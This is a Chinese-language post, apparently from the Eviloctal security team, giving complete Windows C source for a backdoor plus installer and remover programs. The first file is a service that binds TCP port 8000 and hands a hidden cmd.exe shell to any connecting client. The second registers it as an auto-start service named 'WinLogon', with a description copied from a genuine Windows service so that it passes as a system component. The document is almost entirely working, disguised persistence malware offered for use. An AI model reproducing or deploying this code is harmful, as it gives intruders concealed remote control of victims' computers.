信息来源:邪恶八进制信息安全团队( www.eviloctal.com)
1、后门服务的代码:backforservice1.c
Copy code
![]()
/**/ /* 在本机开到服务端口8000,也可以换成其它的反弹型后门*/
#include < winsock2.h >
#include < windows.h >
#include < stdio.h >
// 预编译指令,下面是设置连接器link中的project options,连接器选项值请参考MSDN:
/**/ /*#pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:main")//用来屏蔽控制台应用程序的窗口
#pragma comment(linker,"/IGNORE:4078")
#pragma comment(linker,"/MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.text=DNA32r /SECTION:DNA32r,EWR")*/
#pragma comment(lib, " ws2_32.lib " ) // 链接到WS2_32.LIB库
#define MasterPort 8000 // 连接端口
/**/
// Declare several global variables to share
// their values across multiple functions of your program.
/**/
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;
/**/
// Make the forward definitions of functions prototypes.
//
/**/
void ServiceMain( int argc, char ** argv);
void ControlHandler(DWORD request);
void Entrypoint();
// Control Handler
void ControlHandler(DWORD request)
![]()
{
switch(request)
![]()
{
case SERVICE_CONTROL_STOP:
OutputDebugString("Monitoring stopped.");
//printf("Monitoring stopped.\n");
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (hStatus, &ServiceStatus);
return;
case SERVICE_CONTROL_SHUTDOWN:
OutputDebugString("Monitoring stopped.");
//printf("Monitoring stopped.\n");
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (hStatus, &ServiceStatus);
return;
![]()
default:
break;
}
// Report current status
SetServiceStatus (hStatus, &ServiceStatus);
return;
}
void ServiceMain( int argc, char ** argv)
![]()
{
ServiceStatus.dwServiceType = SERVICE_WIN32;
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
hStatus = RegisterServiceCtrlHandler(
"WinLogon",
(LPHANDLER_FUNCTION)ControlHandler);
if (hStatus == (SERVICE_STATUS_HANDLE)0)
![]()
{
// Registering Control Handler failed
return;
}
![]()
// We report the running status to SCM.
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus (hStatus, &ServiceStatus);
Entrypoint();
return;
}
void Entrypoint()
![]()
{
WSADATA WSADa;
SOCKADDR_IN SockAddrIn;
SOCKET CSocket,SSocket;
int iAddrSize;
PROCESS_INFORMATION ProcessInfo; //进程结构信息,136页
STARTUPINFO StartupInfo; //核心编程第四章20页,高级编程63页
char szCMDPath[255];
//-------------------结构清0
ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
ZeroMemory(&WSADa, sizeof(WSADATA));
//----初始化数据----
//获取cmd路径:
GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));//143页
//加载ws2_32.dll,初使化winsock版本2.2:
WSAStartup(0x0202,&WSADa);//即WSAStartup(MAKEWORD(2,2),&wsaData);
//设置本地信息和绑定协议:
SockAddrIn.sin_family = AF_INET; //表示IPv4地址族
SockAddrIn.sin_addr.s_addr = INADDR_ANY; //表示任意地址
SockAddrIn.sin_port = htons(MasterPort); //端口号
CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); //创建一个套接字
//绑定端口:
bind(CSocket,(SOCKADDR *)&SockAddrIn,sizeof(SockAddrIn));
listen(CSocket,1);
iAddrSize = sizeof(SockAddrIn);
SSocket = accept(CSocket,(SOCKADDR *)&SockAddrIn,&iAddrSize);//返回一个已连接套接字SSocket
//开始连接远程服务器:
StartupInfo.cb = sizeof(STARTUPINFO);
StartupInfo.wShowWindow = SW_HIDE;//表示隐藏窗口
StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
//控制台输入与输出句柄指向已连接套接字SSocket:
StartupInfo.hStdInput = (HANDLE)SSocket;
StartupInfo.hStdOutput = (HANDLE)SSocket;
StartupInfo.hStdError = (HANDLE)SSocket;
//创建匿名管道:
CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess, INFINITE);//142页,函数准备等待到hProcess句柄标识的进程终止运行为止
CloseHandle(ProcessInfo.hProcess);//关闭进程和线程句柄
CloseHandle(ProcessInfo.hThread);
closesocket(CSocket);//关闭这些套接字
closesocket(SSocket);
WSACleanup();//让Winsock释放所有分配的资源,并取消此应用程序挂起的Winsock调用
//关闭连接卸载ws2_32.dll
return;
}
void main( int argc, char * argv[])
![]()
{
SERVICE_TABLE_ENTRY ServiceTable[2];
ServiceTable[0].lpServiceName = "WinLogon";
ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
ServiceTable[1].lpServiceName = NULL;
ServiceTable[1].lpServiceProc = NULL;
// Start the control dispatcher thread for our service
StartServiceCtrlDispatcher(ServiceTable);
}
![]()
2、下面是创建服务的代码:services2.c
Copy code
#include < windows.h >
#include < stdio.h >
int main( void )
{
char* buff;
SC_HANDLE hSCManager,hService;
DWORD hEorr;
LPVOID Info;
Info="为用户和服务身份验证维护此计算机和域控制器之间的安全通道。";
//buff="c:\\Program Files\\Microsoft Visual Studio\\MyProjects\\service\\MemoryStatus\\Debug\\MemoryStatus.exe";
buff="C:\\Program Files\\Microsoft Visual Studio\\MyProjects\\service\\Debug\\backforservice1.exe";
//第一步是打开SCM,获取句柄然后允许创建服务:
hSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//SC_MANAGER_CREATE_SERVICE);
if (hSCManager == NULL)
![]()
{
hEorr =GetLastError();
printf("Open SCManager false
..\n",hEorr);
exit(0);
}
//第二步是创建服务:
hService = CreateService(hSCManager,"WinLogon","WinLogon",SERVICE_ALL_ACCESS, SERVICE_WIN32_SHARE_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,buff, NULL, NULL, NULL, NULL, NULL);//SERVICE_START+DELETE
if (hService!=NULL)
![]()
{ printf("Create service success!\n");
ChangeServiceConfig2(hService,SERVICE_CONFIG_DESCRIPTION,&Info);
//第三步是启动服务:
StartService(hService,0,NULL);
![]()
}
else
![]()
{printf("Create service error!\n");
}
CloseServiceHandle(hSCManager);//关闭服务句柄
CloseServiceHandle(hService);
return 0;
}
![]()
3、下面是删除服务的代码:deleteservice.c
Copy code
#include < windows.h >
#include < stdio.h >
int main( void )
{
SC_HANDLE hSCManager,hService;
DWORD hEorr;
![]()
//第一步是打开SCM,获取句柄然后允许打开服务:
hSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//SC_MANAGER_CREATE_SERVICE);
if (hSCManager == NULL)
![]()
{
hEorr =GetLastError();
printf("Open SCManager false
..\n",hEorr);
exit(0);
}
//第二步是打开服务:
hService = OpenService(hSCManager,"WinLogon",SERVICE_ALL_ACCESS);
if (hService!=NULL)
![]()
{
//第三步是删除指定服务:
if(DeleteService(hService))
printf("Delete service success!\n");
}
else
![]()
{printf("Delete service error!\n");
}
CloseServiceHandle(hSCManager);//关闭服务句柄
CloseServiceHandle(hService);
return 0;
}
![]()